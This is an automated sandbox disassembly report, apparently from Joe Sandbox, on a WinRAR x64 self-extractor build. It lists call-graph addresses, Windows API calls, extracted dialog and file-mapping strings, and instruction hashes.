28671->28944 28945 7ff6c3ba1da4 49 API calls 28671->28945 28946 7ff6c3b9c18c 28671->28946 28949 7ff6c3ba1dbc 56 API calls 2 library calls 28671->28949 28962 7ff6c3ba1d7c FindClose 28671->28962 28963 7ff6c3bb2a5c 49 API calls 28671->28963 28964 7ff6c3bb22c8 53 API calls 3 library calls 28671->28964 28965 7ff6c3bb3058 49 API calls _log10_special 28671->28965 28966 7ff6c3ba37b4 CompareStringW 28671->28966 28967 7ff6c3ba12c8 58 API calls 2 library calls 28671->28967 28969 7ff6c3bb782c 47 API calls 28671->28969 28970 7ff6c3bb6d7c 28671->28970 28672->28671 28674->28671 28680->28671 28681->28671 28685->28671 28691 7ff6c3b937f4 47 API calls 28691->28701 28692->28671 28693->28671 28694 7ff6c3b92254 47 API calls std::locale::global 28694->28701 28695 7ff6c3ba160c 53 API calls 28695->28701 28696->28671 28697->28671 28698->28671 28699->28671 28700 7ff6c3bb63c9 MoveFileW 28700->28701 28701->28649 28701->28670 28701->28671 28701->28691 28701->28694 28701->28695 28701->28700 28702 7ff6c3bb63df MoveFileExW 28701->28702 28950 7ff6c3ba1694 53 API calls 3 library calls 28701->28950 28951 7ff6c3ba4198 49 API calls 3 library calls 28701->28951 28952 7ff6c3ba38b8 49 API calls 28701->28952 28953 7ff6c3ba380c 8 API calls 28701->28953 28954 7ff6c3b99794 28701->28954 28957 7ff6c3ba19a0 53 API calls 3 library calls 28701->28957 28958 7ff6c3b97198 49 API calls 28701->28958 28959 7ff6c3ba4dc8 49 API calls shared_ptr 28701->28959 28960 7ff6c3b9fac0 49 API calls 28701->28960 28961 7ff6c3ba1dbc 56 API calls 2 library calls 28701->28961 28968 7ff6c3bb6e54 67 API calls 4 library calls 28701->28968 28702->28701 28705->28671 28706->28505 28707->28361 28709 7ff6c3bb1c1b 28708->28709 28710 7ff6c3bb1c16 28708->28710 28712 7ff6c3bb1ce8 13 API calls 2 library calls 28709->28712 28994 7ff6c3bb1bb4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28710->28994 28712->28379 28739 7ff6c3ba1d38 28713->28739 28717 7ff6c3ba6a27 28744 7ff6c3ba6cd4 28717->28744 28719 7ff6c3ba69c0 28719->28717 28721 7ff6c3ba6584 47 API calls 28719->28721 28725 7ff6c3ba6a09 SetDlgItemTextW 28719->28725 28721->28719 28722 7ff6c3ba6b51 28757 7ff6c3ba68d8 28722->28757 28725->28719 28726 7ff6c3ba6b7e GetSystemMetrics GetWindow 28730 7ff6c3ba6ca9 28726->28730 28734 7ff6c3ba6ba9 28726->28734 28727 7ff6c3ba6b71 SetDlgItemTextW 28727->28726 28728 7ff6c3ba6a9c 28729 7ff6c3ba6b3a GetWindowRect 28728->28729 28729->28722 28731 7ff6c3bb92f0 _log10_special 8 API calls 28730->28731 28732 7ff6c3ba6cb8 28731->28732 28732->28547 28733 7ff6c3ba6bc6 GetWindowRect 28733->28734 28734->28730 28734->28733 28735 7ff6c3ba6c88 GetWindow 28734->28735 28735->28730 28735->28734 28737 7ff6c3ba6dd2 GetWindowLongW SetWindowLongW 28736->28737 28738 7ff6c3ba6df5 28736->28738 28737->28738 28738->28547 28740 7ff6c3ba1ce0 50 API calls 28739->28740 28741 7ff6c3ba1d54 28740->28741 28742 7ff6c3bac520 WideCharToMultiByte 28741->28742 28743 7ff6c3bac562 28742->28743 28743->28719 28745 7ff6c3ba68d8 51 API calls 28744->28745 28747 7ff6c3ba6d16 28745->28747 28746 7ff6c3bb92f0 _log10_special 8 API calls 28748 7ff6c3ba6a39 GetWindowRect GetClientRect 28746->28748 28749 7ff6c3b920b4 49 API calls 28747->28749 28756 7ff6c3ba6d7b 28747->28756 28748->28722 28748->28728 28750 7ff6c3ba6d40 28749->28750 28751 7ff6c3b92254 std::locale::global 47 API calls 28750->28751 28752 7ff6c3ba6d57 28751->28752 28753 7ff6c3b920b4 49 API calls 28752->28753 28754 7ff6c3ba6d65 28753->28754 28755 7ff6c3b92254 std::locale::global 47 API calls 28754->28755 28755->28756 28756->28746 28758 7ff6c3ba1d38 50 API calls 28757->28758 28759 7ff6c3ba6917 28758->28759 28760 7ff6c3bac520 WideCharToMultiByte 28759->28760 28761 7ff6c3ba692f 28760->28761 28762 7ff6c3ba6584 47 API calls 28761->28762 28763 7ff6c3ba6944 28762->28763 28764 7ff6c3bb92f0 _log10_special 8 API calls 28763->28764 28765 7ff6c3ba6954 28764->28765 28765->28726 28765->28727 28767 7ff6c3b91da4 std::exception_ptr::_Current_exception 49 API calls 28766->28767 28768 7ff6c3ba39d7 std::exception_ptr::_Current_exception 28767->28768 28769 7ff6c3ba39e2 SHGetPathFromIDListW 28768->28769 28770 7ff6c3ba39fd std::exception_ptr::_Current_exception 28769->28770 28773 7ff6c3b9129c 49 API calls shared_ptr 28770->28773 28775->28565 28776->28565 28777->28575 28787 7ff6c3bb2634 GdipAlloc 28778->28787 28780 7ff6c3bb277a 28781 7ff6c3bb278c 28780->28781 28782 7ff6c3bb2724 GdipCreateBitmapFromStream 28780->28782 28781->28588 28782->28781 28788 7ff6c3b991ac 28783->28788 28785 7ff6c3bb25d4 GdipCreateHBITMAPFromBitmap 28786 7ff6c3bb2624 28785->28786 28786->28587 28788->28785 28789->28594 28792 7ff6c3ba097f 28791->28792 28793 7ff6c3ba09a7 28791->28793 28792->28793 28794 7ff6c3ba0999 28792->28794 28793->28616 28795 7ff6c3ba19c1 DeleteFileW 28794->28795 28796 7ff6c3ba1a11 28795->28796 28797 7ff6c3ba19d3 28795->28797 28798 7ff6c3bb92f0 _log10_special 8 API calls 28796->28798 28799 7ff6c3b926bc shared_ptr 2 API calls 28797->28799 28801 7ff6c3ba1a20 28798->28801 28800 7ff6c3ba19dd 28799->28800 28813 7ff6c3ba4350 28800->28813 28801->28616 28803 7ff6c3ba19eb 28804 7ff6c3ba1a07 28803->28804 28806 7ff6c3ba19f9 DeleteFileW 28803->28806 28805 7ff6c3b92254 std::locale::global 47 API calls 28804->28805 28805->28796 28806->28804 28808 7ff6c3ba0942 28807->28808 28809 7ff6c3ba092a 28807->28809 28810 7ff6c3ba095f 28808->28810 28890 7ff6c3b9b654 84 API calls 28808->28890 28809->28808 28811 7ff6c3ba0936 FindCloseChangeNotification 28809->28811 28810->28616 28811->28808 28814 7ff6c3ba4383 28813->28814 28815 7ff6c3ba4389 28814->28815 28816 7ff6c3b920b4 49 API calls 28814->28816 28817 7ff6c3bb92f0 _log10_special 8 API calls 28815->28817 28818 7ff6c3ba43a0 28816->28818 28819 7ff6c3ba45d7 28817->28819 28820 7ff6c3ba43b1 28818->28820 28821 7ff6c3ba448c 28818->28821 28819->28803 28824 7ff6c3ba43c2 28820->28824 28839 7ff6c3ba43e6 28820->28839 28822 7ff6c3b926bc shared_ptr 2 API calls 28821->28822 28823 7ff6c3ba4495 28822->28823 28825 7ff6c3ba4a5c 51 API calls 28823->28825 28876 7ff6c3ba4e30 49 API calls 28824->28876 28831 7ff6c3ba449f 28825->28831 28827 7ff6c3ba43d2 28830 7ff6c3b937f4 47 API calls 28827->28830 28828 7ff6c3ba4487 28833 7ff6c3b92254 std::locale::global 47 API calls 28828->28833 28829 7ff6c3b92254 std::locale::global 47 API calls 28829->28828 28832 7ff6c3ba43dd 28830->28832 28835 7ff6c3ba44bd 28831->28835 28836 7ff6c3ba452c 28831->28836 28874 7ff6c3ba4522 28831->28874 28834 7ff6c3b92254 std::locale::global 47 API calls 28832->28834 28833->28815 28834->28828 28879 7ff6c3ba4ecc 49 API calls 2 library calls 28835->28879 28884 7ff6c3ba4e30 49 API calls 28836->28884 28838 7ff6c3ba453d 28841 7ff6c3b937f4 47 API calls 28838->28841 28839->28828 28842 7ff6c3b99768 49 API calls 28839->28842 28844 7ff6c3ba4548 28841->28844 28845 7ff6c3ba4438 28842->28845 28843 7ff6c3ba44d7 28880 7ff6c3b913dc 49 API calls shared_ptr 28843->28880 28847 7ff6c3b92254 std::locale::global 47 API calls 28844->28847 28877 7ff6c3ba4dc8 49 API calls shared_ptr 28845->28877 28850 7ff6c3ba4551 28847->28850 28849 7ff6c3ba44ea 28881 7ff6c3ba4e98 28849->28881 28885 7ff6c3ba38b8 49 API calls 28850->28885 28851 7ff6c3ba444f 28878 7ff6c3b9fac0 49 API calls 28851->28878 28855 7ff6c3ba44fa 28858 7ff6c3b937f4 47 API calls 28855->28858 28856 7ff6c3ba445f 28857 7ff6c3b937f4 47 API calls 28856->28857 28859 7ff6c3ba446a 28857->28859 28860 7ff6c3ba4505 28858->28860 28861 7ff6c3b92254 std::locale::global 47 API calls 28859->28861 28862 7ff6c3b92254 std::locale::global 47 API calls 28860->28862 28864 7ff6c3ba4473 28861->28864 28866 7ff6c3ba450e 28862->28866 28863 7ff6c3ba4559 28865 7ff6c3b99768 49 API calls 28863->28865 28868 7ff6c3b92254 std::locale::global 47 API calls 28864->28868 28869 7ff6c3ba459a 28865->28869 28867 7ff6c3b92254 std::locale::global 47 API calls 28866->28867 28870 7ff6c3ba4518 28867->28870 28868->28832 28871 7ff6c3b91294 49 API calls 28869->28871 28872 7ff6c3b92254 std::locale::global 47 API calls 28870->28872 28873 7ff6c3ba45a6 28871->28873 28872->28874 28875 7ff6c3b92254 std::locale::global 47 API calls 28873->28875 28874->28829 28875->28874 28876->28827 28877->28851 28878->28856 28879->28843 28880->28849 28886 7ff6c3b912cc 28881->28886 28883 7ff6c3ba4eaf shared_ptr 28883->28855 28884->28838 28885->28863 28887 7ff6c3b912db 28886->28887 28888 7ff6c3b91450 49 API calls 28887->28888 28889 7ff6c3b91315 shared_ptr 28887->28889 28888->28889 28889->28883 28891->28671 28892->28671 28894->28671 28974 7ff6c3b9128c 28895->28974 28913->28671 28915 7ff6c3bb76e5 28914->28915 28916 7ff6c3bb77c8 28914->28916 28917 7ff6c3b926bc shared_ptr 2 API calls 28915->28917 28918 7ff6c3bb92f0 _log10_special 8 API calls 28916->28918 28920 7ff6c3bb76ee 28917->28920 28919 7ff6c3bb605f GetDlgItem 28918->28919 28919->28669 28975 7ff6c3bb7524 28920->28975 28922 7ff6c3bb76fb 28923 7ff6c3b926bc shared_ptr 2 API calls 28922->28923 28924 7ff6c3bb7704 28923->28924 28925 7ff6c3b920b4 49 API calls 28924->28925 28926 7ff6c3bb7715 28925->28926 28927 7ff6c3b920b4 49 API calls 28926->28927 28928 7ff6c3bb7733 28927->28928 28929 7ff6c3b920b4 49 API calls 28928->28929 28930 7ff6c3bb774b 28929->28930 28931 7ff6c3bb2eec 53 API calls 28930->28931 28932 7ff6c3bb7774 28931->28932 28933 7ff6c3b92254 std::locale::global 47 API calls 28932->28933 28934 7ff6c3bb7790 28933->28934 28935 7ff6c3b92254 std::locale::global 47 API calls 28934->28935 28936 7ff6c3bb779a 28935->28936 28937 7ff6c3b92254 std::locale::global 47 API calls 28936->28937 28938 7ff6c3bb77a4 28937->28938 28939 7ff6c3b93be4 49 API calls 28938->28939 28941 7ff6c3bb77b4 28938->28941 28939->28941 28940 7ff6c3b92254 std::locale::global 47 API calls 28942 7ff6c3bb77be 28940->28942 28941->28940 28943 7ff6c3b92254 std::locale::global 47 API calls 28942->28943 28943->28916 28944->28671 28945->28671 28947 7ff6c3b926bc shared_ptr 2 API calls 28946->28947 28948 7ff6c3b9c19a shared_ptr 28947->28948 28948->28671 28949->28671 28950->28701 28951->28701 28952->28701 28953->28701 28978 7ff6c3b9156c 28954->28978 28956 7ff6c3b997a2 28956->28701 28957->28701 28958->28701 28959->28701 28960->28701 28961->28701 28963->28671 28964->28671 28965->28671 28966->28671 28967->28671 28968->28701 28969->28671 28972 7ff6c3bb6da0 shared_ptr 28970->28972 28971 7ff6c3bb6da5 28971->28671 28972->28971 28973 7ff6c3b99794 49 API calls 28972->28973 28973->28972 28976 7ff6c3b93be4 49 API calls 28975->28976 28977 7ff6c3bb7538 28976->28977 28977->28922 28979 7ff6c3b915b6 28978->28979 28981 7ff6c3b9157f shared_ptr 28978->28981 28982 7ff6c3b91654 28979->28982 28981->28956 28983 7ff6c3b9167a 28982->28983 28984 7ff6c3b9174e 28983->28984 28985 7ff6c3b91687 28983->28985 28993 7ff6c3b91dc0 49 API calls std::_Xinvalid_argument 28984->28993 28988 7ff6c3b9250c shared_ptr 2 API calls 28985->28988 28990 7ff6c3b916a6 shared_ptr 28988->28990 28989 7ff6c3b9170d 28989->28981 28990->28989 28992 7ff6c3b9218c 47 API calls 2 library calls 28990->28992 28994->28709 28995 7ff6c3bb06f0 28996 7ff6c3bb0714 28995->28996 28997 7ff6c3bb06fd 28995->28997 28997->28996 28999 7ff6c3bb12f8 28997->28999 29000 7ff6c3bb1308 28999->29000 29001 7ff6c3bb1317 28999->29001 29000->29001 29003 7ff6c3bb0de0 29000->29003 29001->28996 29004 7ff6c3bb0f71 29003->29004 29005 7ff6c3bb0e17 29003->29005 29006 7ff6c3bb92f0 _log10_special 8 API calls 29004->29006 29008 7ff6c3b920b4 49 API calls 29005->29008 29007 7ff6c3bb0f7d 29006->29007 29007->29001 29009 7ff6c3bb0e34 29008->29009 29027 7ff6c3bacb40 29009->29027 29011 7ff6c3bb0e5d 29012 7ff6c3bb0eca 29011->29012 29052 7ff6c3bb11c0 49 API calls shared_ptr 29011->29052 29030 7ff6c3bac820 29012->29030 29014 7ff6c3bb0eb5 29015 7ff6c3b937f4 47 API calls 29014->29015 29017 7ff6c3bb0ec1 29015->29017 29019 7ff6c3b92254 std::locale::global 47 API calls 29017->29019 29019->29012 29021 7ff6c3bb0eea 29022 7ff6c3bb0ef3 GlobalAlloc 29021->29022 29023 7ff6c3bb0f0e 29022->29023 29025 7ff6c3bb0f4c 29023->29025 29040 7ff6c3bb0c7c 29023->29040 29026 7ff6c3b92254 std::locale::global 47 API calls 29025->29026 29026->29004 29028 7ff6c3bacb62 std::exception_ptr::_Current_exception 29027->29028 29029 7ff6c3bacb6d CompareStringW 29028->29029 29029->29011 29032 7ff6c3bac84a 29030->29032 29031 7ff6c3bac95f 29034 7ff6c3bb1494 29031->29034 29032->29031 29033 7ff6c3bacccc 49 API calls 29032->29033 29033->29032 29035 7ff6c3bb14a7 shared_ptr 29034->29035 29036 7ff6c3b96d94 49 API calls 29035->29036 29037 7ff6c3bb14e4 shared_ptr 29036->29037 29039 7ff6c3bb14ff 29037->29039 29053 7ff6c3bb1604 49 API calls shared_ptr 29037->29053 29039->29021 29042 7ff6c3bb0cc6 29040->29042 29041 7ff6c3bb0db9 29043 7ff6c3bb92f0 _log10_special 8 API calls 29041->29043 29042->29041 29044 7ff6c3bb0d65 29042->29044 29045 7ff6c3bb0dcd 29043->29045 29054 7ff6c3bb0f94 50 API calls shared_ptr 29044->29054 29045->29025 29047 7ff6c3bb0d6e 29048 7ff6c3bb0d94 ShowWindow 29047->29048 29049 7ff6c3b927dc SetDlgItemTextW 29048->29049 29050 7ff6c3bb0db0 29049->29050 29051 7ff6c3b92254 std::locale::global 47 API calls 29050->29051 29051->29041 29052->29014 29053->29039 29054->29047 29055 7ff6c3bb0190 GetClientRect CopyRect 29056 7ff6c3bb0239 29055->29056 29057 7ff6c3bb92f0 _log10_special 8 API calls 29056->29057 29058 7ff6c3bb0248 29057->29058 29059 7ff6c3bb0150 IsWindow 29060 7ff6c3bb016e 29059->29060 29061 7ff6c3bbc670 29068 7ff6c3bbf93c 29061->29068 29064 7ff6c3bbc67d 29069 7ff6c3bbf944 29068->29069 29071 7ff6c3bbf975 29069->29071 29072 7ff6c3bbc679 29069->29072 29082 7ff6c3bbfc38 29069->29082 29087 7ff6c3bbf984 DeleteCriticalSection 29071->29087 29072->29064 29074 7ff6c3bbc7dc 29072->29074 29098 7ff6c3bbfb0c 29074->29098 29088 7ff6c3bbf9bc 29082->29088 29085 7ff6c3bbfc83 InitializeCriticalSectionAndSpinCount 29086 7ff6c3bbfc78 29085->29086 29086->29069 29087->29072 29089 7ff6c3bbfae3 29088->29089 29094 7ff6c3bbfa00 __vcrt_InitializeCriticalSectionEx 29088->29094 29089->29085 29089->29086 29090 7ff6c3bbfa2e LoadLibraryW 29092 7ff6c3bbfa4f GetLastError 29090->29092 29093 7ff6c3bbfaa5 29090->29093 29091 7ff6c3bbfac5 GetProcAddress 29091->29089 29096 7ff6c3bbfad6 29091->29096 29092->29094 29093->29091 29095 7ff6c3bbfabc FreeLibrary 29093->29095 29094->29089 29094->29090 29094->29091 29097 7ff6c3bbfa71 LoadLibraryExW 29094->29097 29095->29091 29096->29089 29097->29093 29097->29094 29099 7ff6c3bbf9bc __vcrt_InitializeCriticalSectionEx 5 API calls 29098->29099 29100 7ff6c3bbfb31 TlsAlloc 29099->29100 29108 7ff6c3bb8475 29109 7ff6c3bb8b00 14 API calls 29108->29109 29110 7ff6c3bb84b4 29109->29110 29111 7ff6c3bb28e8 PeekMessageW 29112 7ff6c3bb2908 GetMessageW 29111->29112 29113 7ff6c3bb294c 29111->29113 29114 7ff6c3bb2936 TranslateMessage DispatchMessageW 29112->29114 29115 7ff6c3bb2927 IsDialogMessageW 29112->29115 29114->29113 29115->29113 29115->29114 29116 7ff6c3bb818c 29117 7ff6c3bb809b 29116->29117 29118 7ff6c3bb8b00 14 API calls 29117->29118 29118->29117
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Item$Text$Message$ButtonChecked$ErrorFileLast$DialogSendViewWindow$CloseCommandCountCreateDispatchForegroundHandleLineLongMappingParamSleepTickTranslateUnmap
                                                            • String ID: -el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$STARTDLG$WinRAR$__tmp_rar_sfx_access_check_$d$p$runas$winrarsfxmappingfile.tmp
                                                            • API String ID: 2871939584-91551015
                                                            • Opcode ID: b9c47037542b67834d7a0200151014d0992c603676f7b0dcaeaf442f5d3da4de
                                                            • Instruction ID: 227ac22bca43099aa8e233bace7cc7f32b483bb61ccec67c5253c0f354db0e08
                                                            • Opcode Fuzzy Hash: b9c47037542b67834d7a0200151014d0992c603676f7b0dcaeaf442f5d3da4de
                                                            • Instruction Fuzzy Hash: 9F92A425E0CB4242FA14AF25E893AF97361AFB7746F400031D9CDEB6A6DE2DE509C741

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 582 7ff6c3bb41d0-7ff6c3bb428c call 7ff6c3baa548 call 7ff6c3ba4a5c call 7ff6c3bb2794 call 7ff6c3b926bc * 4 call 7ff6c3bbbb80 call 7ff6c3bb461c call 7ff6c3bb419c GetCommandLineW 603 7ff6c3bb43ce-7ff6c3bb4515 call 7ff6c3ba4964 call 7ff6c3b937f4 call 7ff6c3b92254 call 7ff6c3b9128c SetEnvironmentVariableW GetLocalTime call 7ff6c3ba1d38 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6c3ba5b14 call 7ff6c3bb071c * 2 DialogBoxParamW call 7ff6c3bb0794 582->603 604 7ff6c3bb4292-7ff6c3bb42ba call 7ff6c3b920b4 call 7ff6c3bb4730 call 7ff6c3b92254 582->604 646 7ff6c3bb451a-7ff6c3bb452b call 7ff6c3bb0794 603->646 618 7ff6c3bb42c0-7ff6c3bb42da OpenFileMappingW 604->618 619 7ff6c3bb43ad-7ff6c3bb43bf call 7ff6c3b920b4 call 7ff6c3bb4688 604->619 621 7ff6c3bb42e0-7ff6c3bb4303 MapViewOfFile 618->621 622 7ff6c3bb43a2-7ff6c3bb43ab CloseHandle 618->622 632 7ff6c3bb43c4-7ff6c3bb43c9 call 7ff6c3b92254 619->632 621->622 625 7ff6c3bb4309-7ff6c3bb4341 call 7ff6c3b917e4 UnmapViewOfFile MapViewOfFile 621->625 622->603 625->622 635 7ff6c3bb4343-7ff6c3bb439c call 7ff6c3bb4128 call 7ff6c3bb4688 call 7ff6c3ba8864 call 7ff6c3ba8770 call 7ff6c3ba86bc UnmapViewOfFile 625->635 632->603 635->622 652 7ff6c3bb4533-7ff6c3bb453a 646->652 653 7ff6c3bb452d Sleep 646->653 655 7ff6c3bb4541-7ff6c3bb4564 call 7ff6c3ba868c call 7ff6c3bfa0b8 652->655 656 7ff6c3bb453c call 7ff6c3bb723c 652->656 653->652 663 7ff6c3bb4566 call 7ff6c3bfa0b8 655->663 664 7ff6c3bb456c-7ff6c3bb4573 call 7ff6c3b9ffc4 655->664 656->655 663->664 668 7ff6c3bb458e-7ff6c3bb459f 664->668 669 7ff6c3bb4575-7ff6c3bb457b 664->669 671 7ff6c3bb45a1-7ff6c3bb45ad call 7ff6c3bb71d0 CloseHandle 668->671 672 7ff6c3bb45b3-7ff6c3bb45c1 call 7ff6c3b9ffc4 668->672 669->668 670 7ff6c3bb457d-7ff6c3bb4589 call 7ff6c3b9b9c0 669->670 670->668 671->672 678 7ff6c3bb45c3-7ff6c3bb45d0 672->678 679 7ff6c3bb45e6-7ff6c3bb4619 call 7ff6c3bb2804 call 7ff6c3bb92f0 672->679 681 7ff6c3bb45e0-7ff6c3bb45e2 678->681 682 7ff6c3bb45d2-7ff6c3bb45da 678->682 681->679 684 7ff6c3bb45e4 681->684 682->679 683 7ff6c3bb45dc-7ff6c3bb45de 682->683 683->679 684->679
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: File$EnvironmentHandleVariableView$AddressCloseCurrentDirectoryModuleProcUnmap$CommandDialogGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime
                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                            • API String ID: 4229727620-3710569615
                                                            • Opcode ID: 4ae8dcc793cea09aea43a3dc4dbc4113840bcadcc63ac6bfb28d7414d2e21f10
                                                            • Instruction ID: 2666a8dc2e62e4f3fa4af1147cad58ff918bc610fda49e980ace4f1ece5af81f
                                                            • Opcode Fuzzy Hash: 4ae8dcc793cea09aea43a3dc4dbc4113840bcadcc63ac6bfb28d7414d2e21f10
                                                            • Instruction Fuzzy Hash: CDC16F75A18B4295EB10EF25E893AB973A0BFB6746F400031D5CDEA6A6DF3CE509C740
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$RarSFX$Software\Microsoft\Windows\CurrentVersion$lnk
                                                            • API String ID: 0-381327784
                                                            • Opcode ID: 344c6e6b81a6546dd1874b499a3455b5a7bdc5232c1c90d7ae4548546823ffd1
                                                            • Instruction ID: 6238c95ce6108973e6d1b9e4c1f16bfe80a6585138659afe01f3945b322c9f3d
                                                            • Opcode Fuzzy Hash: 344c6e6b81a6546dd1874b499a3455b5a7bdc5232c1c90d7ae4548546823ffd1
                                                            • Instruction Fuzzy Hash: FFB23422E18A4695EB10EF64C8929FD6371AFB2359F405132D5CDEB5E6DE2CE909C340

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1407 7ff6c3ba5b4c-7ff6c3ba5bac call 7ff6c3bb9f40 call 7ff6c3b926bc call 7ff6c3ba4af8 1414 7ff6c3ba5bae-7ff6c3ba5bcf call 7ff6c3ba4a08 call 7ff6c3b937f4 call 7ff6c3b92254 1407->1414 1415 7ff6c3ba5bd1-7ff6c3ba5bdd call 7ff6c3b93be4 1407->1415 1419 7ff6c3ba5be2-7ff6c3ba5c04 call 7ff6c3ba04a0 call 7ff6c3ba0580 1414->1419 1415->1419 1428 7ff6c3ba5c0a-7ff6c3ba5c0f 1419->1428 1429 7ff6c3ba616c-7ff6c3ba61af call 7ff6c3ba0534 call 7ff6c3b92254 call 7ff6c3bb92f0 1419->1429 1430 7ff6c3ba5c16-7ff6c3ba5c45 call 7ff6c3ba6e60 * 2 1428->1430 1440 7ff6c3ba5c47-7ff6c3ba5c9a call 7ff6c3ba6e54 call 7ff6c3b91adc call 7ff6c3bc4bb0 call 7ff6c3ba6e54 call 7ff6c3b91adc call 7ff6c3bc4bb0 1430->1440 1454 7ff6c3ba5c9d-7ff6c3ba5ca0 1440->1454 1455 7ff6c3ba5dc7-7ff6c3ba5de9 call 7ff6c3ba0d80 call 7ff6c3bc5050 1454->1455 1456 7ff6c3ba5ca6-7ff6c3ba5cd2 call 7ff6c3ba0f00 call 7ff6c3ba0b30 1454->1456 1455->1429 1465 7ff6c3ba5def-7ff6c3ba5e0c call 7ff6c3ba0b30 1455->1465 1466 7ff6c3ba5d95-7ff6c3ba5da6 call 7ff6c3ba0d80 1456->1466 1467 7ff6c3ba5cd8-7ff6c3ba5ce0 1456->1467 1482 7ff6c3ba5e0e-7ff6c3ba5e16 1465->1482 1483 7ff6c3ba5e18-7ff6c3ba5e2b call 7ff6c3bc5050 1465->1483 1476 7ff6c3ba5dab-7ff6c3ba5db5 1466->1476 1469 7ff6c3ba5d10-7ff6c3ba5d19 1467->1469 1470 7ff6c3ba5ce2-7ff6c3ba5cea 1467->1470 1474 7ff6c3ba5d1b-7ff6c3ba5d2a 1469->1474 1475 7ff6c3ba5d4a-7ff6c3ba5d52 1469->1475 1470->1469 1473 7ff6c3ba5cec-7ff6c3ba5d0a call 7ff6c3bc4fd0 1470->1473 1473->1469 1495 7ff6c3ba5d92 1473->1495 1474->1475 1477 7ff6c3ba5d2c-7ff6c3ba5d32 1474->1477 1480 7ff6c3ba5d82-7ff6c3ba5d88 1475->1480 1481 7ff6c3ba5d54-7ff6c3ba5d5c 1475->1481 1478 7ff6c3ba5dbe-7ff6c3ba5dc1 1476->1478 1479 7ff6c3ba5db7-7ff6c3ba5db9 1476->1479 1477->1475 1485 7ff6c3ba5d34-7ff6c3ba5d48 call 7ff6c3bc4b6c 1477->1485 1478->1429 1478->1455 1479->1454 1480->1466 1487 7ff6c3ba5d8a 1480->1487 1481->1480 1486 7ff6c3ba5d5e-7ff6c3ba5d7c call 7ff6c3bc4fd0 1481->1486 1488 7ff6c3ba5e4f-7ff6c3ba5e91 call 7ff6c3ba9aa8 call 7ff6c3bc5050 1482->1488 1483->1429 1499 7ff6c3ba5e31-7ff6c3ba5e4c call 7ff6c3bac574 call 7ff6c3bc4b98 1483->1499 1485->1475 1500 7ff6c3ba5d8f 1485->1500 1486->1429 1486->1480 1487->1467 1506 7ff6c3ba5ea0-7ff6c3ba5eb5 1488->1506 1507 7ff6c3ba5e93-7ff6c3ba5e9b call 7ff6c3bc4b98 1488->1507 1495->1466 1499->1488 1500->1495 1510 7ff6c3ba608b-7ff6c3ba60a4 call 7ff6c3ba63bc call 7ff6c3bc4b98 1506->1510 1511 7ff6c3ba5ebb-7ff6c3ba5ec6 1506->1511 1507->1429 1528 7ff6c3ba60a9-7ff6c3ba60c5 call 7ff6c3bc4b98 call 7ff6c3ba6e08 1510->1528 1514 7ff6c3ba62d7-7ff6c3ba62e1 1511->1514 1515 7ff6c3ba5ecc-7ff6c3ba5ed1 1511->1515 1514->1510 1517 7ff6c3ba62e7-7ff6c3ba62f1 1514->1517 1518 7ff6c3ba5ede-7ff6c3ba5ee3 1515->1518 1519 7ff6c3ba5ed3-7ff6c3ba5ed8 1515->1519 1523 7ff6c3ba6360-7ff6c3ba636a 